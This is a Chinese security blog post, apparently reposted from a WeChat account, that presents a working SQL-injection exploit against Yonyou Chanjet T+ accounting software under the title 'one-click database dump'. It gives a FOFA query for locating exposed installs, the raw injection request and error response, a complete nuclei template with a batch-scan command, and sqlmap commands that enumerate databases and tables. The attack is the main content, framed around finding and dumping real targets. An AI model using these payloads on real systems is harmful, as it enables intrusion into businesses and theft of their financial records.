【2023HW】畅捷通T+ 一键拖库

admin
admin
admin
102367
文章
87
评论
2023年10月13日09:06:10评论99 views字数 2736阅读9分7秒阅读模式


使



01

漏洞名称



畅捷通T+软件SQL注入点较多,本文主要以checkmutex 为例,其他注入点利用方式基本相同,发送0012获取所有注入点的nuclei POC文件


用友 畅捷通T+ checkmutex SQL注入漏洞

用友 畅捷通T+ checkpassword SQL注入漏洞

用友 畅捷通T+ getschedule SQL注入漏洞

用友 畅捷通T+ getsendactionbymenu  SQL注入漏洞

用友 畅捷通T+ updateschedule SQL注入漏洞


02


漏洞影响


用友 畅捷通T+

【2023HW】畅捷通T+ 一键拖库



03


漏洞描述


畅捷通是用友集团的成员企业,旨在为企业提供全面的财务管理解决方案。作为畅捷通的核心产品,好业财是一款高效、稳定、易用的财务管理工具,它可以帮助企业快速建立财务管理体系,提升财务管理效率。T+是用友畅捷通推出的一款新型互联网企业管理系统,T+能够满足成长型小微企业对其灵活业务流程的管控需求,重点解决往来业务管理、订单跟踪、资金、库存等管理难题。用户可以通过各种固定或移动设备随时随地迅速获取企业实时、动态的运营信息。

该软件存在多个SQL注入点,容易造成数据泄露。



04


资产FOFA搜索语句

app="畅捷通-TPlus"

【2023HW】畅捷通T+ 一键拖库



05


漏洞复现


向目标发送数据包

POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1Host: x.x.x.x:xxUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36Connection: closeContent-Length: 53Content-Type: text/plainCookie: ASP.NET_SessionId=; sid=adminAccept-Encoding: gzip
{"accNum": "6'", "functionTag": "SYS0104", "url": ""}

响应数据包如下

HTTP/1.1 200 OKConnection: closeContent-Length: 147Cache-Control: no-cacheContent-Type: text/plain; charset=utf-8Date: Wed, 11 Oct 2023 06:05:55 GMTExpires: -1Pragma: no-cacheServer: nginx/1.9.9Set-Cookie: ASP.NET_SessionId=gxirc31lpe130teiaa3rlzqs; path=/; HttpOnlyX-Aspnet-Version: 4.0.30319
{"value":"102 数据库错误, 请重试!rnrn“YWTPro”附近有语法错误。rn字符串 ' order by begintime' 后的引号不完整。"}

证明该资产存在SQL注入漏洞


06


使用nuclei批量扫描漏洞


checkmutex 注入点的nuclei poc如下,其他注入点的POC在文末免费获取

id: yonyou-chanjet-tplus-checkmutex-sqli
info:  name: yonyou-chanjettplus - SQL Injection  author: fgz  severity: high  description: |    T+是用友畅捷通推出的一款新型互联网企业管理系统,T+能够满足成长型小微企业对其灵活业务流程的管控需求,重点解决往来业务管理、订单跟踪、资金、库存等管理难题。用户可以通过各种固定或移动设备随时随地迅速获取企业实时、动态的运营信息。  tags: chanjet,sqli  metadata:    verified: true    max-request: 1    fofa-query: app="畅捷通-TPlus"
http:  - raw:      - |        POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1        Host: {{Hostname}}        Content-Type: text/plain        Cookie: ASP.NET_SessionId=; sid=admin
        {"accNum": "6'", "functionTag": "SYS0104", "url": ""}        matchers:      - type: word        words:          - "附近有语法错误"          - ""value""        part: body        condition: or

运行POC批量发现漏洞

nuclei.exe -t ./yonyou-chanjet-tplus-checkmutex-sqli.yaml -l ./1.txt -me result

【2023HW】畅捷通T+ 一键拖库



07


sqlmap 一键拖库


上述漏扫通过-me参数指定markdown格式输出,其中有记录完整的数据包,在本地新建一个a.txt文件,然后将Request内容复制到文件中

【2023HW】畅捷通T+ 一键拖库

vim a.txt
POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1Host: x.x.x.x:xxUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36Connection: closeContent-Length: 53Content-Type: text/plainCookie: ASP.NET_SessionId=; sid=adminAccept-Encoding: gzip
{"accNum": "6'", "functionTag": "SYS0104", "url": ""}

qw保存文件

使用sqlmap命令获取数据库列表

sqlmap -r a.txt --dbs

【2023HW】畅捷通T+ 一键拖库


获取表名

sqlmap -r a.txt -D UFTSystem --tables

【2023HW】畅捷通T+ 一键拖库


08


您的关注点赞是我分享的动力,万分感谢!



原文始发于微信公众号(AI与网安):【2023HW】畅捷通T+ 一键拖库

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月13日09:06:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【2023HW】畅捷通T+ 一键拖库http://cn-sec.com/archives/2108255.html

发表评论

匿名网友 填写信息